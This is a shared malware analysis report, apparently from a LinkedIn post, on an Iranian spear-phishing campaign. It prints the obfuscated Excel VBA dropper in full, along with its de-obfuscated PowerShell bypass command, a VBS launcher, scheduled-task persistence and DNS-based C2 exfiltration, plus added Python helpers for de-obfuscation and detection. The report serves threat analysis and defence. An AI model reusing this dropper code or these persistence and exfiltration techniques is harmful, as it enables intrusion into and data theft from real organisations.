Good morning,
Regarding the news about an Iranian hacking group discovered targeting aerospace and telecom,
I would like to share a malware analysis report I created in 2017 about Iranian malware targeting aerospace and telecom.
#malware #hacking #aerospace #telecom #pentest #redteam
Iranian Non-malware Fileless Attacks targeting aerospace and telecom
1. Page 1 of 15
This is an Internal Document and should not be shared with unauthorized users.
Iranian Malware analysis report
Iranian malware Targeting Aerospace and Telecom in 2017
Author: Ahmed El-fanagely
Linkedin: https://www.linkedin.com/in/ahmed-pentest/
VERSION 1.0
4. ANNUAL REPORT | 2018 4
2 EXECUTIVE SUMMARY
In this attack, spear phishing was used as the initial infection vector. Before launching the attack,
the group studied publicly available information about the targeted organization and identified
email addresses belonging to various departments of the company.
Email addresses in one department received phishing emails with a malicious xlsx file.
The phishing emails claimed to contain an urgent HR survey. They were carefully crafted
and written on behalf of a human resources department.
Once the attacker compromised one employee's email credentials, the attacker started sending
phishing emails to everyone in the same department with a malicious xlsx file.
These phishing emails claimed to contain an urgent payment that needed checking in the xlsx file.
They were carefully crafted and written on behalf of the victim employee.
The attachment received by email is the IOC shown below:
File name            File format  MD5 hash value
TNA.March17.001.xls  XLS          2a462cdbaee3b0340bc6298057d83240
3 TOOLSET
• Notepad++
• SSView
• Olevba
4 MITRE ATT&CK
ID         Name
T1566.001  Phishing: Spearphishing Attachment
T1204.002  User Execution: Malicious File
T1546.013  Event Triggered Execution: PowerShell Profile
T1053.005  Scheduled Task/Job: Scheduled Task
T1059.005  Command and Scripting Interpreter: Visual Basic
T1071.004  Application Layer Protocol: DNS
VBA MACRO ANALYSIS
If a victim opens the malicious Microsoft Excel spreadsheet attached to the email, they see a
workbook with a single visible sheet containing invoice data.
As soon as the user clicks "Enable Content", the first stage of the malware payload is allowed
to execute.
Figure 1 Malicious Excel spreadsheet
Let us use the popular oledump and olevba Python scripts to examine whether the XLS file
contains any VBA macros:
Figure 2 Malicious Excel spreadsheet
According to olevba, the workbook contains VBA macros. In the extracted VBA code we observed
the following procedure, which reads data from worksheet cells:
Private Sub Workbook_Open()
    Call F5615664                                           ' runs automatically once content is enabled
End Sub
Sub F5615664()
    On Error Resume Next
    A4660720 = "wS" & "cri" & "pt." & "Sh" & "ell"          ' "WScript.Shell", split to defeat string matching
    I6611623 = "Sc" & "ript" & "ing." & "File" & "Sy" & "stemOb" & "ject"   ' "Scripting.FileSystemObject"
    Set U5777083 = CreateObject(A4660720)
    Set D6945409 = CreateObject(I6611623)
    W2151843 = U5777083.ExpandEnvironmentStrings("%temp%\U1848931.TMP")
    I2622608 = ActiveWorkbook.Worksheets(1).Cells(37, 27)   ' hidden cell AA37 holds base64 data
    Set M9383463 = D6945409.OpenTextFile(W2151843, 2, True) ' 2 = ForWriting, create the file if missing
    M9383463.WriteLine (I2622608)
    M9383463.Close
    U1808667 = ActiveWorkbook.Worksheets(1).Cells(40, 27)   ' hidden cell AA40 holds the encoded command
    K7517347 = "cmd" & ".e" & "xe -e" & "xec b" & "ypas" & "s -E" & "nc "
    V1380609 = K7517347 & U1808667
    U5777083.Run V1380609, 0                                ' 0 = hidden window
    ActiveWorkbook.Worksheets(2).Visible = True             ' show the decoy sheets and hide the payload sheet
    ActiveWorkbook.Worksheets(3).Visible = True
    ActiveWorkbook.Worksheets(2).Activate
    ActiveWorkbook.Worksheets(1).Visible = False
    ActiveWorkbook.Save
End Sub
We did not observe any such data in the visible cells initially, so we extracted the Workbook
stream with SSView, a Windows GUI structured storage viewer, and loaded it into our hex editor.
Figure 3 SSView
Reviewing the extracted Workbook stream further in the hex editor, we observed obfuscated data
that was base64-encoded (an obfuscation technique) and therefore not visible initially.
Figure 3 encode base64
Find below the de-obfuscated data (the PowerShell script malware).
We then debugged the Sub F5615664 in the Visual Basic Editor, since it is the procedure called
from Workbook_Open. We were able to get the de-obfuscated values of the first two variables:
A4660720 = "wS" & "cri" & "pt." & "Sh" & "ell"
I6611623 = "Sc" & "ript" & "ing." & "File" & "Sy" & "stemOb" & "ject"
Result:
A4660720 = "wScript.Shell"
I6611623 = "Scripting.FileSystemObject"
Next we observed the following lines, which refer to data in the cells:
W2151843 = U5777083.ExpandEnvironmentStrings("%temp%U1848931.TMP")
I2622608 = ActiveWorkbook.Worksheets(1).Cells(37, 27)
Set M9383463 = D6945409.OpenTextFile(W2151843, 2, True)
M9383463.WriteLine (I2622608)
M9383463.Close
We found hidden data in these cells, as shown in Figure 3. This data is base64-encoded, and the
VBA macro writes it to the file "%temp%\U1848931.TMP" using the code above.
The next lines read data from another cell and then execute it:
U1808667 = ActiveWorkbook.Worksheets(1).Cells(40, 27)
K7517347 = "cmd" & ".e" & "xe -e" & "xec b" & "ypas" & "s -E" & "nc "
V1380609 = K7517347 & U1808667
U5777083.Run V1380609, 0
The de-obfuscated result:
U1808667 = ActiveWorkbook.Worksheets(1).Cells(40, 27)
K7517347 = "cmd.exe -exec bypass -Enc "
V1380609 = K7517347 & U1808667
U5777083.Run V1380609, 0
I used the following simple procedures to dump the hidden cell data to text files:
Sub Print_p1_file()
    Dim strFile_Path As String
    strFile_Path = "C:\Users\User\Desktop\p1.txt"
    Open strFile_Path For Output As #1
    I2622608 = ActiveWorkbook.Worksheets(1).Cells(37, 27)   ' base64 payload written to the .TMP file
    Write #1, I2622608
    Close #1
End Sub
Sub Print_p2_file()
    Dim strFile_Path As String
    strFile_Path = "C:\Users\User\Desktop\p2.txt"
    Open strFile_Path For Output As #1
    U1808667 = ActiveWorkbook.Worksheets(1).Cells(40, 27)   ' encoded command passed to -Enc
    Write #1, U1808667
    Close #1
End Sub
Result:
Now let us decode the data and start the malware analysis.
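The same de-obfuscation can be done statically instead of stepping through the Visual Basic Editor. The helper below is an added Python example, not code from the report: it joins the "&"-split string literals, resolves the ProgIDs passed to CreateObject, and decodes a PowerShell -Enc argument. The macro excerpt reuses the variable lines quoted above; the -Enc payload is a benign constructed value.

```python
import base64
import re

# Constructed excerpt in the style of the report's macro (the -Enc payload used
# below is a benign command built at the end, so the block runs offline).
SAMPLE_MACRO = '''
A4660720 = "wS" & "cri" & "pt." & "Sh" & "ell"
I6611623 = "Sc" & "ript" & "ing." & "File" & "Sy" & "stemOb" & "ject"
Set U5777083 = CreateObject(A4660720)
Set D6945409 = CreateObject(I6611623)
K7517347 = "cmd" & ".e" & "xe -e" & "xec b" & "ypas" & "s -E" & "nc "
V1380609 = K7517347 & U1808667
'''

CONCAT = re.compile(r'"\s*&\s*"')                            # closing quote, &, opening quote
ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*"((?:[^"]|"")*)"\s*$')  # VAR = "one literal"

def join_literals(line: str) -> str:
    """Collapse "a" & "b" & "c" into "abc"; variable references are left alone."""
    return CONCAT.sub("", line)

def resolve_literals(macro: str) -> dict:
    """Map every variable assigned a pure string literal to its joined value."""
    values = {}
    for line in macro.splitlines():
        m = ASSIGN.match(join_literals(line))
        if m:
            values[m.group(1)] = m.group(2).replace('""', '"')  # VBA doubles quotes
    return values

def resolve_create_object(macro: str, values: dict) -> list:
    """List CreateObject(...) calls with the argument replaced by its resolved ProgID."""
    return [values.get(m.group(1), m.group(1))
            for m in re.finditer(r"CreateObject\((\w+)\)", macro)]

def decode_enc_payload(b64: str) -> str:
    """powershell -Enc carries the script as base64 of its UTF-16LE text."""
    return base64.b64decode(b64).decode("utf-16-le")

# Benign constructed -Enc payload so the decoder has input to run on.
SAMPLE_ENC = base64.b64encode("Write-Output 'constructed'".encode("utf-16-le")).decode()
```

Lines such as V1380609 = K7517347 & U1808667 stay unresolved because one operand comes from a worksheet cell, which is exactly why the hidden cells had to be dumped.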
5 POWERSHELL MALWARE DEEP DIVE
The malicious document creates a PowerShell file and a VBS file and then continues executing the
payload using the following paths and command line:
• Malware path before the profile ID is inserted: C:\Users\User\AppData\Local\Temp\U1848931.TMP
• Malware path: C:\Users\User\AppData\Local\Microsoft\Windows\mc.ps1
• VBS path: C:\Users\User\AppData\Local\Microsoft\Windows\L69742.vbs
• Command line (note that this string is executed by the VBS script):
powershell.exe -NoP -sta -NonI -exec bypass -file C:\Users\User\appdata\local\microsoft\Windows\mc.ps1
Figure 4: Infection procedure
As soon as the macro executes and launches PowerShell, the malware is dropped and proceeds
through a multistage deployment procedure:
1: PowerShell loader: creates the machine ID and decodes the malware file
2: VBS script: executes the malware
3: MC PowerShell malware: offers functionality to control infected victims
Let us start by analysing the PowerShell loader. As we see below, the first function is
responsible for creating the VBS script.
VBS data after decoding:
set wss = CreateObject("WScript.Shell")
str = "power" & "sh" & "ell" & ".e" & "xe -NoP -sta -NonI -e" & "xe" & "c byp" & "as" & "s -fi" & "le "
path = "#dpath#"
str = str + path + "mc.ps1"
wss.Run str, 0
The second function decodes the malware code, creates the machine ID and inserts it into the
second stage, "mc.ps1".
The last function is responsible for creating a scheduled task named "GoogleServiceUpdate" that
executes the VBS script "L69742.vbs" every 2 minutes.
Let us now analyse the PowerShell malware. The mc.ps1 PowerShell malware offers functionality to
control infected victims:
1: Creates paths and folders
2: Reads the HDD data
3: Downloads and implants additional tools and malware through DNS requests
4: DNS data exfiltration
As we see in the image below, the first several lines are parameter values, including the script
path, download folder, upload folder, machine ID, max host length and C2 server.
The function in the next image is responsible for terminating PowerShell if the number of
execution orders exceeds 4.
The function "base32data" highlighted below is responsible for encoding and decoding the data
before and after communicating with the C2.
The next function is responsible for creating the "dn" folder and the "up" folder.
The following function is responsible for communicating with the C2 and downloading files
through DNS requests using the Windows "nslookup.exe" binary.
Let us go deeper into this function. In the first step, the script builds the DNS request by
replacing "([string]$id)" with the machine ID "40699", then adds random data to the DNS request
and sends it to the C2.
If the C2 responds with OK, the script continues with the batch file download function. If the
C2 responds with NO, the script continues to the upload file function, as shown in the image
below.
The C2 continues to send and receive data through DNS requests until a request contains
"EOFEOF", which means the file is complete.
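A defender-side view of the DNS channel described above (the base32data encoding and the "EOFEOF" end marker): an added Python example, not code from the report, that scans DNS query names, decodes base32 labels, groups them by base domain and reassembles what was carried. The machine ID 40699 is reused from the report; the C2 domain and the query log lines are constructed.

```python
import base64
import re
from collections import defaultdict

def _b32_label(text: str) -> str:
    """Base32-encode text and drop '=' padding, which cannot appear in a DNS label."""
    return base64.b32encode(text.encode()).decode().rstrip("=")

# Constructed sample of query names as a resolver or Sysmon DNS log would record
# them (not from the report); the C2 domain is a placeholder, the machine ID is 40699.
SAMPLE_QUERIES = [
    "www.microsoft.com",
    "update.googleapis.com",
    _b32_label("first chunk of a file") + ".40699.c2.example.invalid",
    _b32_label("second chunk") + ".40699.c2.example.invalid",
    _b32_label("EOFEOF") + ".40699.c2.example.invalid",
    "mail.example.com",
]
B32_LABEL = re.compile(r"^[A-Z2-7]{8,63}$")  # base32 alphabet, long enough to carry data
EOF_MARKER = b"EOFEOF"                       # end-of-transfer marker named in the report

def decode_b32_label(label: str):
    """Return the decoded bytes of a padding-stripped base32 label, or None."""
    try:
        return base64.b32decode(label.upper() + "=" * (-len(label) % 8))
    except ValueError:
        return None

def analyze_query(name: str) -> dict:
    """Split a query name into its registrable base domain and data-carrying labels."""
    labels = name.strip(".").split(".")
    data = [l for l in labels[:-2] if B32_LABEL.match(l.upper())]
    decoded = b"".join(d for d in map(decode_b32_label, data) if d)
    return {"base_domain": ".".join(labels[-2:]), "data_labels": data,
            "decoded": decoded, "eof": EOF_MARKER in decoded}

def scan(queries, min_hits: int = 2) -> dict:
    """Group encoded queries by base domain; report domains seen >= min_hits times."""
    streams = defaultdict(lambda: {"hits": 0, "payload": b"", "eof": False})
    for q in queries:
        info = analyze_query(q)
        if not info["data_labels"]:
            continue
        s = streams[info["base_domain"]]
        s["hits"] += 1
        s["eof"] = s["eof"] or info["eof"]
        if not info["eof"]:
            s["payload"] += info["decoded"]
    return {d: s for d, s in streams.items() if s["hits"] >= min_hits}
```

The alphabet check alone will match some legitimate hostnames, so the per-domain hit count and the presence of the end marker are what separate a transfer from noise.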